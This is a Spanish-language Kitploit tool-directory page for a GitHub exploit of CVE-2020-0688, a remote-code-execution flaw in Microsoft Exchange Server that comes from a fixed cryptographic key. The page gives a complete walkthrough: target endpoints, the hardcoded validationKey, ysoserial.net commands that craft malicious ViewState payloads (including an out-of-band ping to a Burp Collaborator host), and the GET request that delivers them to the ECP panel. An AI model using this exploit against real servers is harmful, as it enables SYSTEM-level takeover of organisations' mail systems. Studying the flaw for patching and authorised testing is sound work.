Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-0688 — [CVE-2020-0688] Microsoft Exchange Server: ejecución remota de código (RCE) mediante clave criptográfica fija | Kitploit
Herramientas/GitHubGitHub/murataydemir/cve-2020-0688
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubmurataydemir/cve-2020-0688

CVE-2020-0688

[CVE-2020-0688] Microsoft Exchange Server: ejecución remota de código (RCE) mediante clave criptográfica fija

Ver Repositorio
41hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

[CVE-2020-0688] Ejecución remota de código (RCE) en Microsoft Exchange Server mediante clave criptográfica fija


En lugar de tener claves generadas aleatoriamente por instalación, todas las instalaciones de Microsoft Exchange Server tienen los mismos valores validationKey y decryptionKey en web.config. Por lo tanto, un atacante autenticado puede engañar al servidor para que deserialice datos ViewState maliciosamente manipulados. Con la ayuda de YSoSerial.net, un atacante puede ejecutar código .NET arbitrario en el servidor en el contexto de la aplicación web del Panel de control de Exchange (ECP), que se ejecuta con privilegios de SYSTEM.

Paso 1: Visita uno de los siguientes endpoints y accede a la página de autenticación

  • http(s)://exchangeserver/owa
  • http(s)://exchangeserver/owa/auth.owa
  • http(s)://exchangeserver/owa/auth/logon.aspx
  • http(s)://exchangeserver/ecp
  • http(s)://exchangeserver/ecp/default.aspx

Paso 2: Inicia sesión con una credencial (sin importar los privilegios de la cuenta de usuario) y obtén los valores válidos de ASP_NET_SessionId y __VIEWSTATEGENERATOR de la cookie de la respuesta HTTP y del cuerpo de la respuesta HTTP, respectivamente. Por ejemplo

  • ASP_NET_SessionId: 05ae4b41-51e1-4c3a-9241-6b87b169d663
  • __VIEWSTATEGENERATOR: B97B4E27
  • validationKey (Fijo): CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
  • validationalg (Fijo): SHA1

Paso 3: Para generar el payload (para comprobar la vulnerabilidad), utiliza YSoSerial.net

Ten en cuenta que si tienes acceso al servidor Exchange de la víctima, puedes usar el siguiente payload, que crea un archivo de texto en el directorio C:\ con el nombre PoC.txt

root@kitploit:~
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

Sin embargo, si no puedes acceder al servidor, lo siguiente podría ser mejor.

root@kitploit:~
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

Paso 4: Después del paso 4, tendremos el payload ViewState codificado en URL. Realiza una solicitud GET al siguiente endpoint con el siguiente formato

root@kitploit:~
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>

La publicación original del blog está disponible aquí

Descargar herramienta